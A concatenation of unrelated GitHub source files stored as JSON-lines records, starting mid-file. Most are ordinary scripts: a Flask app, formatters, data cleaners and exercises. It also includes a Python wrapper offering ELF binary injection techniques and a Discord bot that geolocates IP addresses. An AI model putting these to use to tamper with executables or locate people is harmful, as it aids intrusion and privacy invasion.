for the different environments\nENV = 'dev'\n\nif ENV == 'dev':\n app.debug = True\n app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:123456@localhost/user_addresses'\n\nelse:\n app.debug = False\n app.config['SQLALCHEMY_DATABASE_URI'] = ''\n\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass User_Addresses(db.Model):\n __tablename__ = 'ethereum_addresses'\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String, unique=True)\n\ndb.create_all()\n\ndef __init__(self, address=\"\"):\n self.address = address\n\n@app.route('/')\ndef hello():\n return render_template(\"home.htm\")\n\n\n@app.route(\"/submit\", methods=[\"POST\", \"GET\"])\ndef submit_address():\n if request.method == 'POST':\n address = request.form['address']\n\n\n if len(address) < 6 or len(address) > 64:\n return render_template(\"home.htm\", message=\"Invalid address\")\n\n if db.session.query(User_Addresses).filter(User_Addresses.address == address).count() == 0:\n new_address = User_Addresses(address=address)\n print(new_address)\n db.session.add(new_address)\n db.session.commit()\n return render_template(\"submitted.htm\")\n\n else:\n return render_template(\"oops.htm\")\n return render_template(\"submitted.htm\")\n\nif __name__ == '__main__':\n app.run()","repo_name":"esemoney/win-money","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43681125169","text":"from prettytable import PrettyTable\n\ndef truncate(thing, length, suffix='...'):\n if len(thing) <= length:\n return thing\n return ' '.join(thing[:length+1].split(' ')[0:-1]) + suffix\n\ndef table_basic(conf, args, rows):\n if not rows:\n return\n headers = ['ID', 'Summary', 'Status', 'Link']\n real_rows = []\n table = PrettyTable(headers)\n table.align['ID'] = 'l'\n table.align['Summary'] = 'l'\n\n if 'truncate' not in args:\n args.truncate = 42\n\n for row in rows:\n this_row = [row.key, truncate(row.fields.summary, args.truncate), \"%s\" % row.fields.status, '%sbrowse/%s' % (conf['auth']['url'], row.key)]\n table.add_row(this_row)\n print(table)\n\ndef custom(conf, args, rows):\n table_headers = args.headers\n\n table = PrettyTable(table_headers)\n if 'align' in args:\n for key in args.align:\n table.align[key] = args.align[key]\n for row in rows:\n this_row = []\n for key in args.row_keys:\n this_row.append(row[key])\n table.add_row(this_row)\n print(table)\n\ndef grid(conf, args, rows):\n table = PrettyTable([])\n table.header = False\n for thing in rows:\n table.add_row([thing, rows[thing]])\n print(table)\n\ndef multiday_grid(conf, args, rows):\n headers = ['']\n for row in rows:\n headers.append(row['date'])\n row_headers = [key for key in rows[0].keys() if key != 'date']\n\n table = PrettyTable(headers)\n index = 0\n\n all_rows = []\n for row_header in row_headers:\n all_rows.append([row_header])\n\n for record in rows:\n row_index = 0\n for key in record.keys():\n if key == 'date':\n continue\n all_rows[row_index].append(record[key])\n row_index = row_index + 1\n index = index + 1\n\n for row in all_rows:\n table.add_row(row)\n\n # for row in rows:\n # this_row = []\n #\n # this_row.append(row_headers[index])\n # row_index = 0\n # for thing in row:\n # if thing == 'date':\n # continue\n # if row_index == index:\n # this_row.append(row[thing])\n # row_index = row_index + 1\n # index = index + 1\n # table.add_row(this_row)\n print(table)\n","repo_name":"robballou/harvesttool","sub_path":"harvesttool/formatter/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14098070817","text":"import requests\n\nrand_driver_idx = 0\n\n\ndef current_standings():\n r = requests.get(\"http://ergast.com/api/f1/current/driverStandings.json\")\n data = r.json()[\"MRData\"][\"StandingsTable\"][\"StandingsLists\"][0][\"DriverStandings\"][\n rand_driver_idx\n ][\"Driver\"]\n num = data[\"permanentNumber\"]\n fname = data[\"givenName\"]\n lname = data[\"familyName\"]\n code = data[\"code\"]\n output = f\"The current year's winner is number: {num}, {fname} {lname} ({code})! \"\n return output\n\n\ndef years_standings(year):\n if int(year) >= 2005:\n r = requests.get(f\"http://ergast.com/api/f1/{year}/driverStandings.json\")\n data = r.json()[\"MRData\"][\"StandingsTable\"][\"StandingsLists\"][0][\n \"DriverStandings\"\n ][rand_driver_idx][\"Driver\"]\n num = data[\"permanentNumber\"]\n fname = data[\"givenName\"]\n lname = data[\"familyName\"]\n code = data[\"code\"]\n output = f\"The winner in {year} is number: {num}, {fname} {lname} ({code})! \"\n else:\n output = \"Uhh... sorry we don't have this data :(\"\n return output\n","repo_name":"dai-anna/FantasyF1TeamGenerator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15901132087","text":"from ._rawelf_injection import rawelf_injection\n\nfrom .Manipulators.DynamicManipulator import DYN_TAGS\n\n\nclass RawElfInjector:\n \"\"\"Injection technique supplement for LIEF\n\n CAUTION: Inserting new memory between a section and its\n references can break those references. E.g. .plt uses\n relative addressing for x86_64 PIEs. Appending a new entry\n to .dynamic for a \"classic\" gcc build will result in\n broken references to .got.\n\n CAUTION: Using this class will need the current working\n directory to be writable. This is due to the fact that\n the raw elf parser can only parse a file and is not able\n to take over LIEF's memory representation of the ELF file.\n Thus this class will use 'Binary.write' to store the\n state of the LIEF binary and then reopen the file with the\n raw parser. Eventually, after a function call, LIEF will\n again manage the binary.\n\n Attributes:\n inj (rawelf_injection.rawelf_injector): Provides\n missing injection techniques.\n\n \"\"\"\n\n __inj: rawelf_injection.rawelf_injector\n\n def __init__(self, binName):\n self.__inj = rawelf_injection.rawelf_injector(binName)\n if not self.__inj:\n raise RuntimeError(\"Failed to load {}\".format(binName))\n\n def appendDynamicEntry(self, tag: DYN_TAGS, value: int) -> int:\n \"\"\"Appends a .dynamic entry\n\n This function \"naively\" appends a new entry to\n .dynamic. Notice that with \"normal\" gcc builds, the\n .got section comes immediately after .dynamic. For\n x86_64 PIEs that use addressing of a form like\n \"[rip + ]\", this function will\n break the reference and most likely cause a crash.\n\n Args:\n tag (DYN_TAGS): Tag of the entry\n value (int): Value of the entry\n\n Returns:\n File offset of the new entry\n\n \"\"\"\n result = self.__inj.append_dynamic_entry(tag=tag, value=value)\n return result\n\n def overwriteDynamicEntry(\n self, new_tag: DYN_TAGS, new_value: int, index: int\n ) -> None:\n \"\"\"Overwrites a .dynamic entry\n\n Args:\n new_tag (DYN_TAGS): Tag of new entry\n new_value (int): Value of new entry\n index (int): Index of entry to overwrite\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_dynamic_entry(\n tag=new_tag, value=new_value, index=index\n )\n return result\n\n def appendPhtEntry(\n self,\n ptype: int,\n flags: int,\n offset: int,\n vaddr: int,\n file_size: int,\n mem_size: int,\n align: int,\n ) -> int:\n \"\"\"Appends a new PHT entry to PHT\n\n Args:\n ptype (int): Type of the segment\n flags (int): Access rights for described segment.\n Either PF_X(0x1), PF_W(0x2), PF_R(0x4) or a\n combination of those.\n offset (int): File offset of described segment.\n vaddr (int): Virtual address of described segment.\n file_size (int): Size of segment in file.\n mem_size (int): Size of segment in process image.\n align (int): Alignment s.t. offset = vaddr mod\n align.\n\n Returns:\n Offset of appended PHT entry.\n\n \"\"\"\n result = self.__inj.append_pht_entry(\n ptype=ptype,\n flags=flags,\n offset=offset,\n vaddr=vaddr,\n file_size=file_size,\n mem_size=mem_size,\n align=align,\n )\n return result\n\n def overwritePhtEntry(\n self,\n ptype: int,\n flags: int,\n offset: int,\n vaddr: int,\n file_size: int,\n mem_size: int,\n align: int,\n index: int,\n ) -> None:\n \"\"\"Overwrites an existing PHT entry\n\n Args:\n ptype (int): Type of the segment\n flags (int): Access rights for described segment.\n Either PF_X(0x1), PF_W(0x2), PF_R(0x4) or a\n combination of those.\n offset (int): File offset of described segment.\n vaddr (int): Virtual address of described segment.\n file_size (int): Size of segment in file.\n mem_size (int): Size of segment in process image.\n align (int): Alignment s.t. offset = vaddr mod\n align.\n index (int): Index of PHT entry to overwrite.\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_pht_entry(\n ptype=ptype,\n flags=flags,\n offset=offset,\n vaddr=vaddr,\n file_size=file_size,\n mem_size=mem_size,\n align=align,\n index=index,\n )\n return result\n\n def overwriteMemory(self, offset: int, buffer: bytes) -> None:\n \"\"\"Overwrites specified memory region\n\n The size of the memory region to overwrite is\n indirectly given by the length of 'buffer'.\n\n Args:\n offset (int): File offset of memory region to\n overwrite\n buffer (bytes): Bytes to write into memory region\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.overwrite_memory(offset=offset, buffer=buffer)\n return result\n\n def insertMemory(self, offset: int, buffer: bytes) -> None:\n \"\"\"Inserts new memory into specified region\n\n The amount of bytes to be inserted is given implicitly\n by the length of 'buffer'.\n\n Inserting memory can break cross - references.\n\n Args:\n offset (int): File offset that specifies where to\n \"open a gap\" and to fill that gap with given buffer.\n buffer (bytes): Bytes to write into gap.\n\n Returns:\n None\n\n \"\"\"\n result = self.__inj.insert_memory(offset=offset, buffer=buffer)\n\n return result\n","repo_name":"fkie-cad/ELFbin","sub_path":"injection/src/ElfInjection/RawElfInjection.py","file_name":"RawElfInjection.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2430077455","text":"import pandas as pd\nimport numpy as np\n\ntypes = {'Semana': np.uint8,'Cliente_ID': np.uint16, 'Producto_ID': np.uint16,\n'Demanda_uni_equil': np.uint8}\ntypes2 = {'Cliente_ID': np.uint16, 'Producto_ID': np.uint16}\n\ndftrain = pd.read_csv('../input/train.csv', usecols=types.keys(), dtype=types)\ndftest = pd.read_csv('../input/test.csv',skiprows=0, nrows=1000)\nprint(dftest.head(2))\ndftest['predict']=\"\"\nnumrows =0\nprint(dftest.head(2))\nfor index, row in dftest.iterrows():\n if(numrows%100==0):\n print(numrows)\n numrows+=1\n week = int(row[1])\n ClientId = int(row[5])\n ProductID = int(row[6])\n avg1=0\n avg2=0\n avg3=0\n count1=0\n count2=0\n count3=0\n if week==10:\n \n temp = dftrain[dftrain['Semana'] == week-1]\n temp2 = temp[temp['Cliente_ID'] == ClientId]\n temp3=temp2[temp2['Producto_ID']== ProductID]\n if not temp3.empty:\n avg1 = temp3[\"Demanda_uni_equil\"].mean()\n count1=len(temp3[\"Demanda_uni_equil\"])\n \n dftest.loc[index, 'predict'] = avg1+avg2+avg3\n \n if week==11:\n \n temp = dftrain[dftrain['Semana'] == week-2]\n temp2 = temp[temp['Cliente_ID'] == ClientId]\n temp3=temp2[temp2['Producto_ID']== ProductID]\n if not temp3.empty:\n avg1 = temp3[\"Demanda_uni_equil\"].mean()\n count1=len(temp3[\"Demanda_uni_equil\"])\n \n dftest.loc[index, 'predict'] = avg1+avg2+avg3\n \ndftest.to_csv(\"2.csv\",index = False) \n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/grupo-bimbo-inventory-demand/Lahiru Madushanka/small-change.py","file_name":"small-change.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"42712432019","text":"import os\nimport csv\nimport re\nimport datetime\n\nimport config\n\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\n\ntoday_str = datetime.datetime.now()\ntoday_str = today_str.strftime('%d%b%Y')\n\nCSV_HEADERS = ['firstname', 'lastname', 'email']\n\n\ndef process_folder(input_folder, file_source, output_paths):\n\n target_path = input_folder\n csvfiles = [f for f in os.listdir(target_path) if f.endswith('.csv')]\n\n if not csvfiles:\n print(\"Couldn't find any CSV files in\", target_path, \":(\\nMoving on...\\n\")\n return\n\n total = 0\n total_edm_contacts = 0\n edm_contacts = []\n\n row_process_mapping = {\n 'toreta': process_toreta_row,\n 'camcard': process_camcard_row,\n 'chope': process_chope_row,\n }\n process_row_fn = row_process_mapping[file_source]\n\n # count users with emails\n # remove unnecessary columns to prevent errors in uploads\n for csvfile in csvfiles:\n csv_path = os.path.join(target_path, csvfile)\n with open(csv_path, newline='', encoding='Windows-1252') as _csvfile:\n rows = csv.DictReader(_csvfile, delimiter=',', quotechar='\"')\n for row in rows:\n total += 1\n contact = process_row_fn(row)\n if contact:\n total_edm_contacts += 1\n edm_contacts.append(contact)\n\n print('Processed \"{}\" and found {} users, {} with Emails! Writing to files...'.format(_csvfile.name, total, total_edm_contacts))\n\n for output_path in output_paths:\n # Write to combined file\n with open(output_path, 'a', newline='') as _csvfile:\n writer = csv.DictWriter(_csvfile, CSV_HEADERS)\n writer.writerows(edm_contacts)\n\n print('Appended to', output_paths, '\\n')\n\n\ndef process_toreta_row(row):\n # check for users with email1\n if row['email1']:\n return {\n 'firstname': row['first_name'],\n 'lastname': row['last_name'],\n 'email': row['email1'],\n }\n else:\n return None\n\n\ndef process_chope_row(row):\n # check for users with email1\n if row['Email Address']:\n return {\n 'firstname': row['Diner Name'],\n 'email': row['Email Address'],\n }\n else:\n return None\n\n\ndef process_camcard_row(row):\n # email may have multiple values\n email = None\n emails = re.findall(\"[\\w\\-][\\w\\-\\.]+@[\\w\\-][\\w\\-\\.]+[a-zA-Z]{1,4}\", row['Email'])\n if emails:\n email = emails[0]\n\n # check for users with email1\n if email:\n return {\n 'firstname': row['First Name'],\n 'lastname': row['Last Name'],\n 'email': email,\n }\n else:\n return None\n\n\ndef clear_upload_files():\n files = os.listdir(path=config.UPLOAD_FILES_DIR)\n for f in files:\n with open('{}/{}'.format(config.UPLOAD_FILES_DIR, f), 'w+', newline='') as _csvfile:\n writer = csv.DictWriter(_csvfile, CSV_HEADERS)\n writer.writeheader()\n\n print('Emptied these files:', files, '\\n')\n","repo_name":"wasabigeek/toretaToBenchmark","sub_path":"utils/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124053680","text":"def print2D(table):\n for i in range(len(table)):\n for j in range(len(table[i])):\n print(table[i][j], end=\" \")\n print()\n\n\ndef countSubstrings(s: str) -> int:\n # initialize NxN dynamic programming table\n dpTable = [[False for i in range(len(s))] for j in range(len(s))]\n count = 0\n # bottom-up fill in dynamic table\n # True if substring[i:j+1] is a palindrome\n # always True for length 1\n # always False when j < i\n # when length = 2, true if s[i] is same as s[j]\n # for any others, True iff s[i] == s[j] and dpTable[i+1][j-1] is also True\n for i in range(len(s)-1, -1, -1):\n for j in range(len(s)-1, -1, -1):\n if i == j:\n dpTable[i][j] = True\n count += 1\n elif i > j:\n dpTable[i][j] = False\n elif i+1 == j and s[i] == s[j]:\n dpTable[i][j] = True\n count += 1\n elif s[i] == s[j] and dpTable[i+1][j-1]:\n dpTable[i][j] = True\n count += 1\n print2D(dpTable)\n\n return count\n\n\n# test driver\ninput = \"abc\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n\ninput = \"aaa\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n\ninput = \"aababba\"\nprint(\"Input:\", input)\nprint(\"Output:\", countSubstrings(input))\nprint()\n","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"DynamicProgramming/PalindromicSubstrings/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39691007817","text":"#=================Sonic the Cyber Warrior============================\r\n#Made for Educational Purposes, not responsible for your actions!!!!\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nimport socket\r\nimport pygeoip\r\nimport requests\r\n\r\n#===================Sonic the Cyber Warrior======================\r\n\r\nbot = commands.Bot(command_prefix='?')\r\nbot.remove_command('help')\r\ntoken = ''\r\n\r\n#======================Sonic the Cyber Warrior====================\r\n\r\n@bot.event\r\nasync def on_ready():\r\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name=\"Ip LookUp | use prefix: ?\"))\r\n print('Bot is ready.')\r\n\r\ngip = pygeoip.GeoIP(str('GeoLiteCity.dat'))\r\n\r\narray1 = []\r\n\r\nclass iplookup():\r\n async def lookup_class(self, *, arg):\r\n array1.clear()\r\n x = str(input())\r\n y = array1.append(x)\r\n return '{}'.format(y,arg)\r\n\r\n@bot.command()\r\nasync def lookup(ctx, *, request=str(iplookup)):\r\n res = gip.record_by_addr(request)\r\n for key,val in res.items():\r\n await ctx.send('%s : %s' % (key,val))\r\n\r\n@bot.command()\r\nasync def ip(ctx, *, question):\r\n b = socket.gethostbyname(question)\r\n await ctx.send(f'{question} ip address: {b}')\r\n\r\n#=======================Sonic the Cyber Warrior=====================\r\n\r\nbot.run(token)\r\n","repo_name":"s0n1c268/IpLookUpBot","sub_path":"IpLookUpBot.py","file_name":"IpLookUpBot.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15474056859","text":"class Employee:\n def __init__(self,emp_Id,emp_name,__emp_salary, emp_dep):\n self.emp_Id = emp_Id\n self.emp_name =emp_name\n self.__emp_salary = __emp_salary\n self.__emp_dep = emp_dep #by addign __ meaning we are changing the class instant from public to private\n def calculate_emp_salary(self,hoursWorked):\n if hoursWorked > 50:\n overtime = hoursWorked-50\n Overtime_amount = (overtime*(self.__emp_salary/50))\n return Overtime_amount\n else:\n return self.__emp_salary\n \n return __emp_salary\n def set_emp_assign_dep (self,newDep):\n self.__emp_dep = newDep\n def print_emp_details(self):\n return \"employee name : {} employee ID : {} employee dep : {} employee salary : {}\".format(self.emp_name,self.emp_Id,self.__emp_dep,self.__emp_salary)\n \nemp1= Employee(\"E787\",\"ADAMS\",50000,\"ACCOUNTING\")\nemp2= Employee(\"E7499\",\"JONES\",45000,\"RESEARCH\")\nemp3= Employee(\"E7900\",\"MARTIN\",50000,\"SALES\")\nemp4= Employee(\"E7698\",\"SMITH\",55000,\"OPERATIONS\")\nprint (emp1.print_emp_details())\nprint (emp2.print_emp_details())\nprint (emp3.print_emp_details())\nprint (emp4.print_emp_details())\n\nemp4.set_emp_assign_dep(\"HR\")\nprint (emp1.calculate_emp_salary(20))\nprint (emp2.calculate_emp_salary(50))\nprint (emp3.calculate_emp_salary(70))\nprint (emp4.calculate_emp_salary(30))\n\n\n\n\n \n \n \n \n ","repo_name":"SumaiyaMaqbool/SumaiyaCodeAcademy","sub_path":"WK3Day1EmployeeClasses.py","file_name":"WK3Day1EmployeeClasses.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20691841915","text":"from binascii import hexlify, unhexlify\nfrom itertools import islice\nfrom operator import itemgetter\nimport re, sys\nfrom struct import pack, unpack\n\n\nclass Error(Exception): pass\nclass InvalidRecordError(Error): pass\nclass RecordClashError(Error): pass\nclass ArgumentError(Error): pass\nclass InputFileError(Error): pass\nclass InputRecordError(Error): pass\n\n\nclass BinaryAppDataStore(object):\n \"\"\" A store for binary application data.\n \"\"\"\n def __init__(self):\n self.r = _DataRecords()\n self.start_address = 0\n\n def record(self, i):\n \"\"\" Access the i-th record in the store.\n A (start address, data) tuple is returned.\n\n Accessing a non-existent record will throw IndexError\n \"\"\"\n return self.r.record(i)\n\n def num_records(self):\n \"\"\" Number of records in the store\n \"\"\"\n return self.r.num_records()\n\n def records(self):\n \"\"\" Iterate over the records. Each item is a tuple\n (start address, data).\n\n Example:\n\n b = BinaryAppData()\n ... # add some records or file data\n\n for rec_addr, rec_data in b.records():\n # rec_addr holds the start address of the\n # record, and rec_data is the record data\n \"\"\"\n return self.r.records()\n\n def iter_addr_data(self):\n \"\"\" Iterate over (address, data) pairs of all the contents\n of the store.\n\n Example:\n\n for (addr, data) in b.iter_addr_data():\n print \"At %s, data is %s\" % (addr, data)\n \"\"\"\n for rec_addr, rec_data in self.records():\n for offset in range(len(rec_data)):\n yield (rec_addr + offset, rec_data[offset])\n\n def __iter__(self):\n \"\"\" Iterate over the store's data contents.\n\n Example:\n\n for data_byte in b:\n print data_byte\n\n Note that it returns only the data bytes, without\n their addresses. To iterate over (addr, data) pairs\n use iter_addr_data()\n \"\"\"\n return iter(map(itemgetter(1), self.iter_addr_data()))\n\n def __len__(self):\n \"\"\" The total amount of data in the store\n \"\"\"\n return len(self.r)\n\n def __getitem__(self, addr):\n \"\"\" Data item retrieval (by address) from the store.\n Given a store b, b[addr] retrieves the data item at\n 'addr'.\n\n Raises IndexError when the store has no such address\n \"\"\"\n return self.r[addr]\n\n def add_record(self, address, data, merge=False):\n \"\"\" Directly add a record to the data store.\n The record has a start address and a data string.\n\n If merge is True, will try to merge the new record\n with its neighbors, if applicable (if the new record\n and one or both of its neighbors form a consecutive\n record).\n \"\"\"\n self.r.add_record(address, data, merge)\n\n\nclass DataFormatterBinary(object):\n \"\"\" Formatter for raw binary data.\n \"\"\"\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Read binary data and return a store object. The data\n store is also saved in the interal 'data' attribute.\n\n The data can either be taken from a string (str\n argument) or a file (provide a filename, which will\n be read in binary mode). If both are provided, the str\n will be used. If neither is provided, an ArgumentError\n is raised.\n\n Optionally, you can provide a destination address for\n the data. If none is provided, 0 will be used.\n\n Note: if the store already contains data, this\n operation may result in a RecordClashError.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n file = open(filename, 'rb')\n str = file.read()\n file.close()\n\n self.data = BinaryAppDataStore()\n self.data.add_record(addr, str, merge=True)\n return self.data\n\n def write(self, filename=None, padbyte=None, padtosize=None):\n \"\"\" Writes the internal store in binary format.\n\n If a filename is provided, the data is written to the\n named file. Otherwise, the data is returned as a\n string.\n\n Padding:\n\n The records in the data store might be inconsecutive,\n so the output will have to be padded. The padding\n is applied:\n - Before the first record, if it doesn't start at 0\n - Between inconsecutive records\n - After the last record and up until padtosize, if\n that is provided (padtosize is ignored if no\n padbyte is given)\n\n If padbyte isn't provided, no padding will be done.\n If padbyte is provided, it will be taken as a single\n byte stored in a string (for example 'a' or '\\x61').\n\n Warning: if the records in your data store don't begin\n at 0 or aren't consecutive, beware of padding. A\n single record beginning at 50,000,000 and having two\n bytes will result in a 50-Meg file.\n \"\"\"\n str = _datastore2string(self.data, padbyte, padtosize)\n\n if filename:\n file = open(filename, 'wb')\n file.write(str)\n file.close()\n else:\n return str\n\n\nclass DataFormatterHexpair(object):\n \"\"\" Formatter for hexpair data.\n \"\"\"\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Works similarly to read() in DataFormatterBinary.\n\n In addition, may throw InputFileError if the input\n file is not formatted correctly.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n file = open(filename, 'r')\n str = file.read()\n file.close()\n\n # remove all the separators\n str = re.sub('[^a-fA-F0-9]', '', str)\n\n try:\n data = unhexlify(str)\n except TypeError:\n err = sys.exc_info()[1]\n raise InputFileError('hexpair string invalid: %s' % err.message)\n\n self.data = BinaryAppDataStore()\n self.data.add_record(addr, data, merge=True)\n return self.data\n\n def write(self, filename=None, padbyte=None, padtosize=None,\n linelength=80, separator=' '):\n \"\"\" Works similarly to DataFormatterBinary.write(),\n with some of extra parameters.\n\n linelength:\n The output will be split to lines with maximum\n linelength characters (including the separators,\n but not including newlines).\n If negative, output will be a single line.\n If positive, must be large enough to accomodate\n a single hexpair + separator.\n\n separator:\n The separator to insert between each hex pair.\n \"\"\"\n binstr = _datastore2string(self.data, padbyte, padtosize)\n hexpair_str = separator.join(string2hexpairs(binstr)).upper()\n\n if linelength > 0:\n # length of a single unit: a hexpair (two chars) with\n # a separator\n #\n unit_len = 2 + len(separator)\n\n if linelength < unit_len:\n raise ArgumentError('linelength too short')\n\n # adjust the linelength to contain an integral amount\n # of units\n #\n linelength -= linelength % unit_len\n\n lines = split_subsequences(hexpair_str, linelength)\n hexpair_str = '\\n'.join(lines) + '\\n'\n\n if filename:\n file = open(filename, 'w')\n file.write(hexpair_str)\n file.close()\n else:\n return hexpair_str\n\n\n_64K = 0x10000\n\n\nclass DataFormatterIntelHex(object):\n def __init__(self, data=None):\n self.data = data or BinaryAppDataStore()\n\n def read(self, str=None, filename=None, addr=0):\n \"\"\" Works similarly to read() in DataFormatterBinary.\n\n An Intel Hex file may specify its load address. In\n such a case, the addr argument is ignored.\n\n Can raise InputFileError on errors in the input file.\n \"\"\"\n if str is None:\n if filename is None:\n raise ArgumentError('Please supply a string or a filename')\n\n str = open(filename, 'r').read()\n\n # At any stage in the parsing of an Intel Hex file,\n # there's an address offset that have been computed in\n # an earlier line. Such offsets can either be linear or\n # segment. Initially, the offset is in addr, and we\n # assume the offset is linear.\n #\n addr_offset = addr\n is_linear_offset = True\n\n MAX_64K = 0xffff\n MAX_4G = 0xffffffff\n\n for linenum, line in enumerate(str.splitlines()):\n def line_error(msg):\n raise InputFileError('error in line %s: %s' % (linenum + 1, msg))\n\n line = line.strip()\n if not line: continue\n\n try:\n type, record_offset, data = self._parse_line(line)\n except self._LineError:\n err = sys.exc_info()[1]\n line_error(err.message)\n\n # The algorithm: each line will be added to the data\n # store as a separate record, relying on record\n # merging to compact the data as much as possible.\n #\n if type == 'Data':\n load_addr = 0\n\n if is_linear_offset:\n load_addr = addr_offset + record_offset\n\n # (LBA + DRLO + DRI) MOD 4G\n #\n # Records that extend beyond the 4G boundary\n # must be cut in two, and wrapped around to\n # LBA (addr_offset)\n #\n if load_addr + len(data) > MAX_4G + 1:\n # compute the length of data that will fit\n # until MAX_4G\n #\n fit_len = MAX_4G + 1 - load_addr\n\n # Place the data that fits in the end\n #\n self.data.add_record( load_addr,\n data[0:fit_len],\n merge=True)\n\n # And whatever didn't fit at addr_offset\n #\n self.data.add_record( addr_offset,\n data[fit_len:],\n merge=True)\n else:\n # the record fits, so just add it\n #\n self.data.add_record( load_addr, data,\n merge=True)\n else:\n # SBA + ([DRLO + DRI] MOD 64K)\n # data is wrapped around 64K boundaries\n #\n if record_offset + len(data) > MAX_64K + 1:\n fit_len = MAX_64K + 1 - record_offset\n self.data.add_record( addr_offset + record_offset,\n data[0:fit_len],\n merge=True)\n self.data.add_record( addr_offset,\n data[fit_len:],\n merge=True)\n else:\n self.data.add_record( addr_offset + record_offset, data,\n merge=True)\n\n elif type == 'EndFile':\n return self.data\n\n elif type in ('LinearOffset', 'SegmentOffset'):\n if len(data) != 2:\n line_error('expecting a 2-byte data field for this record type, got %s' % len(data))\n field_val = unpack('>H', data)[0]\n\n if type == 'SegmentOffset':\n is_linear_offset = False\n addr_offset = field_val << 4\n else:\n is_linear_offset = True\n addr_offset = field_val << 16\n\n elif type == 'LinearStartAddr':\n if len(data) != 4:\n line_error('expecting a 4-byte data field for this record type, got %s' % len(data))\n self.data.start_address = unpack('>L', data)[0]\n\n elif type == 'SegmentStartAddr':\n if len(data) != 4:\n line_error('expecting a 4-byte data field for this record type, got %s' % len(data))\n\n (cs, ip) = unpack('>HH', data)\n self.data.start_address = (cs << 4) + ip\n else:\n assert 0, 'Unexpected type %s' % type\n\n return self.data\n\n def write( self,\n filename=None,\n bytes_per_data_line=32,\n write_start_address=False,\n use_segment_addressing=False):\n \"\"\" Writes the internal store in Intel HEX format.\n\n If a filename is provided, the data is written to the\n named file. Otherwise, the data is returned as a\n string.\n\n Note that files output in Intel HEX require no\n padding, since records will be split to begin at\n different addresses.\n\n bytes_per_data_line:\n The maximal amount of bytes to output in one line\n of data records. Although the format allows 256,\n it is customary to print out only 32 (probably\n because it's a round (in base 16) number that\n makes the output fit in a 80-char line).\n\n write_start_address:\n If True, the start address of the data store will\n be written to the output as a separate record\n (type 05 or 03)\n\n use_segment_addressing:\n If True, the 16-bit segment addressing will be\n used for output. Note that in this case the size\n of the addressable memory is 1 MB.\n \"\"\"\n if bytes_per_data_line > 256:\n raise ArgumentError('bytes_per_data_line must be <= 256')\n\n # How this works:\n #\n # First some nomenclature:\n # <<\n # In the jargon of pybinaryappdata, a data store\n # (BinaryAppData) consists of 'records'.\n # Unfortunately, this collides with the jargon of Intel\n # Hex files, where each line is a record of some type. To\n # avoid confusion, I'll refer to Intel HEX records as\n # 'lines'. 'Records' are BinaryAppData records.\n # >>\n #\n # Records are assumed to be non-consecutive (otherwise\n # they would be merged on creation). If they're\n # consecutive, the output will still be correct, though\n # it will contain a few unnecessary lines.\n #\n # For each record, an address offset line is specified,\n # followed by lines listing the record's data. If the\n # record is larger than 64K (the maximal offset allowable\n # in data lines), it is split to several blocks (which\n # follow one another). For example, if the data store\n # consists of a single 100K record at address 0, it is\n # split to two - the first is given an offset 0 and has\n # 64K data items, and the second is given an offset 64K\n # and contains 36K data items.\n #\n # At the end of the file, the start address and\n # end-of-file lines are written.\n #\n output = []\n\n for rec_start, rec_data in self.data.records():\n rec_end = rec_start + len(rec_data)\n\n if (use_segment_addressing and rec_end > 0xFFFFF or\n rec_end > 0xFFFFFFFF):\n raise InputRecordError(\"record at %s-%s won't fit in memory\" % (rec_start, rec_end))\n\n # The following few lines compute the blocks to which\n # this record has to be split. The maximal size of\n # a block is 64K\n #\n blocks_64K = [rec_start]\n i = rec_start + _64K - (rec_start % _64K)\n\n while i < rec_end:\n blocks_64K.append(i)\n i += _64K\n\n data_ptr = 0\n\n #~ print \"Rec:\", rec_start, rec_end, '> blocks:', blocks_64K\n\n # Now, for each block, write an address offset\n # line, and compute the amount of data to include in\n # the block.\n # Then, generate the data lines for the block.\n #\n for i, block_start in 